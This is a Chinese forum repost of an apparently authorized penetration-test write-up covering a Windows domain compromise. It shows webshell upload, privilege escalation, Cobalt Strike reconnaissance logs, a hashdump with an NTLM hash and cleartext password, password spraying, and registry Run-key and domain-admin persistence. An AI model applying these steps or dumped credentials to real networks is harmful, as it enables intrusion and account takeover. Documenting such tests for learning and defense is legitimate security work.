安全矩阵

 找回密码
 立即注册
搜索
查看: 672|回复: 0

实战!某次授权的大型内网渗透测试

[复制链接]

102

主题

102

帖子

330

积分

中级会员

Rank: 3Rank: 3

积分
330
发表于 2023-5-16 20:55:05 | 显示全部楼层 |阅读模式
0x00 前言

接到朋友邀请,要进行一个授权站点的渗透,但是进去实际环境才发现是多域控主机。也学习了很多后渗透手法,比较受益匪浅。

0x01 前期渗透

打点:(任意文件上传)
直接发现头像处任意文件上传,这里直接上传冰蝎即可。


tasklist查看杀软

0x02 内网渗透

边缘机的systeminfo
因为前期拿到了边缘机,这里查看systeminfo,发现是2012R2的主机。

边缘机提权:(利用烂土豆直接提上权限)

提权之后做进程迁移,直接把进程迁移到lsass进程中去。

内网信息收集:
先查看ip,看是否存在双网卡机


  1. Windows IP Configuration

  2.    Host Name . . . . . . . . . . . . : CAMS-SQL3
  3.    Primary Dns Suffix  . . . . . . . : AVV.org
  4.    Node Type . . . . . . . . . . . . : Hybrid
  5.    IP Routing Enabled. . . . . . . . : No
  6.    WINS Proxy Enabled. . . . . . . . : No
  7.    DNS Suffix Search List. . . . . . : AVV.org

  8. Ethernet adapter Ethernet:

  9.    Connection-specific DNS Suffix  . :
  10.    Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
  11.    Physical Address. . . . . . . . . : 00-50-56-98-E3-D6
  12.    DHCP Enabled. . . . . . . . . . . : No
  13.    Autoconfiguration Enabled . . . . : Yes
  14.    Link-local IPv6 Address . . . . . : fe80::a5b1:d534:730:3123%11(Preferred)
  15.    IPv4 Address. . . . . . . . . . . : 10.2.0.49(Preferred)
  16.    Subnet Mask . . . . . . . . . . . : 255.255.254.0
复制代码
域控:

  1. net group "domain controllers" /domain

  2. [04/26 18:16:59] beacon> shell net group "domain Controllers" /domain
  3. [04/26 18:17:00] [*] Tasked beacon to run: net group "domain Controllers" /domain
  4. [04/26 18:17:00] [+] host called home, sent: 69 bytes
  5. [04/26 18:17:00] [+] received output:
  6. The request will be processed at a domain controller for domain FPC.LOCAL.

  7. Group name     Domain Controllers
  8. Comment        All domain controllers in the domain

  9. Members

  10. -------------------------------------------------------------------------------
  11. AVV-DC1$                 AVV-DC2$                 AVV-DHDC01$              
  12. AVV-DHDC02$
复制代码
域管:

  1. net group "domain admins" /domain

  2. fpcadmin                 mqd.ns         
  3. mqd.rmm                  mqd.tdv
复制代码
前直接归属的域控和主域控:

  1. net time /domain

  2. [04/26 18:27:52] beacon> shell net time /domain
  3. [04/26 18:27:52] [*] Tasked beacon to run: net time /domain
  4. [04/26 18:27:52] [+] host called home, sent: 47 bytes
  5. [04/26 18:27:54] [+] received output:
  6. Current time at \\AVV-DC2.FPC.LOCAL is 4/26/2023 5:27:53 AM
复制代码
可以发现当前是直接被DC2所归属,这里查下主控制器。这里直接使用CS插件来进行渗透

  1. [04/26 18:31:11] [+] =========== 查看主域控制器 ==========
  2. [04/26 18:31:12] [*] Tasked beacon to run: netdom query pdc
  3. [04/26 18:31:12] [+] host called home, sent: 47 bytes
  4. [04/26 18:31:14] [+] received output:
  5. Primary domain controller for the domain:

  6. AVV-DC1
  7. The command completed successfully.
复制代码
定位域控的IP地址:
这里经过ping之后发现,域控不是都在同一个网段,应该是如下的结构。


内网存活主机探测:
我先进行了DC段和本机段存活主机的探测,这里直接利用cs的插件(portscan)


  1. portscan 10.2.0.0/24
  2. portscan 10.2.92.30/24
  3. portscan 10.6.0.10/24
  4. portscan 10.11.1.12/24
复制代码

fscan扫描本机C段:
潦草的扫描到了ftp的匿名登陆,没有扫描到其他有用信息。这里就不放其他几个段的截图,都没扫描到啥有用的信息。



做hashdump:
这里直接做完hashdump之后发现

  1. msv :   
  2.      [00000003] Primary
  3.      * Username : mqd.tdv
  4.      * Domain   : FPC
  5.      * NTLM     : 7007ebae678042f1cf112578ac43bf68
  6.      * SHA1     : 712ce4bf3a4a777582389d37f8d06158ed204f6b
  7.     tspkg :
  8.     wdigest :   
  9.      * Username : mqd.tdv
  10.      * Domain   : FPC
  11.      * Password : QWE123456QE!@#
  12.     kerberos :  
  13.      * Username : mts.tdv
  14.      * Domain   : FPC
  15.      * Password : QWE123456QE!@#
  16.     ssp :   
  17.     credman :
复制代码
0x03 内网横向
因为自己失误造成了比较繁琐的过程

因为前期已经看到了域管的账号就是mqd.tdv,这里直接做密码喷洒,这里转到msf中看下。上线了如此多的主机,同时,DC2子域控也进行了上线

第一天上线的主机:(MSF上)


CS上:(上线74台)

小插曲:
因为渗透到域控的时候,在半夜2点半,所以在拿到DC2的权限的时候,就直接关掉电脑睡觉啦,没有进行留后门和做进程注入,导致第二天上线的时候执行命令出现如下界面。

这里的意思就是启动新进程的时候,系统无法将当前进程的令牌传递给新进程。也就是无法创建进程,所以只能通过其他方式来进行横向渗透。并且后期发现该域管理员密码已经进行修改。
DC挂掉之后的想到的几种方式:
(1) 抓去已控主机的hash看是否有其他域管登陆(失败)
因为前面已经拿到了100多台机子的权限,所以能想到的第一个思路就是把100多台主机上的hash都进行一个抓起取,然后看是否可以抓到域管的账号,但是这里抓完之后会发现,没有一台域管是上线的,所以这里也比较无语。

(2) 利用CVE漏洞来进行横向(失败)
因为之前探测到DC的版本是windows2012 R2版本,所以想到了用ms17-010来进行内网横向,但是这里经过检测之后发现也没有ms17-010的漏洞,所以无法进行横向

(3) 利用CVE漏洞来子域控(CVE-2020-1472)(失败)
这里经过尝试CVE-2020-1472漏洞,也没有发现可以横向上去,通过poc检测发现是fail的。

(4) 尝试攻击exchange服务器,来中继攻陷主机(失败)
这里就不放细节了,均以失败告终。

峰回路转:(DC2子域控上线)
DC2子域控上线过程:
这里经过一天的折磨之后发现,以上的几种方式不好使,但是想到了抓取机器用户的hash,通过构造密码表,来进行域管的密码喷洒,这里抓取了100多个的机器用户和几个域内用户做成密码表,重新进行内网横向。

这里截图部分域内用户,做成密码表后直接进行喷洒,发现域管成功上线。


DC2子域权限维持:
  1. 把当前进程注入到lsass进程中去。
  2. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "C:\Windows\Temp\start.exe"  //开机自启动
  3. 添加域管理员,因为已经拿到域管理员的权限,所以可以添加域管理员,来进行权限维持(这里直接通过lstar的插件来进行域管理员的添加)
复制代码
其他域控上线
这里也是一个小Tip,也是提供给大家的一个思路:在有权限的情况下,可以添加域管理员,然后通过域管理员来进行横向其他域控(这是仅限于一个域),但是上面给出来了结构,这个域都是在一个域内的,所以的话,就可以进行添加管理员来上线。


这里直接放后期上线的域控。

0x04 总结


经过这次实战总结了很多小的技巧。

  1. 可以通过添加域管理员来上线域内的所有主机
  2. 可以通过cs来进行进程注入or进程迁移,来实现本机system权限的获取
  3. 此次实战的密码喷洒尤为重要,所以有机器用户的hash一定要进行抓取
  4. SPN服务横向可以通过打邮服来进行获取域控权限
  5. 学习了权限维持的方法(开机自启动、winrm的横向和psexec的横向)

  6. 恶补了一大波内网知识(比靶场来的实在)
复制代码
不足之处:

  1. 此次通过内网渗透,虽然打了邮件服务器,但是没有通过邮件服务器来拿下DC的权限。
  2. 没有通过SPN票据横向拿下对应的服务器,比如MSSQL的和CIFS的
  3. 此次没有利用白银票据进行横向(得重新学习)
复制代码
  1. 文章来源:奇安信攻防社区(用户773616194)
  2. 原文地址:https://forum.butian.net/share/2261
复制代码









本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 15:47 , Processed in 0.014099 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表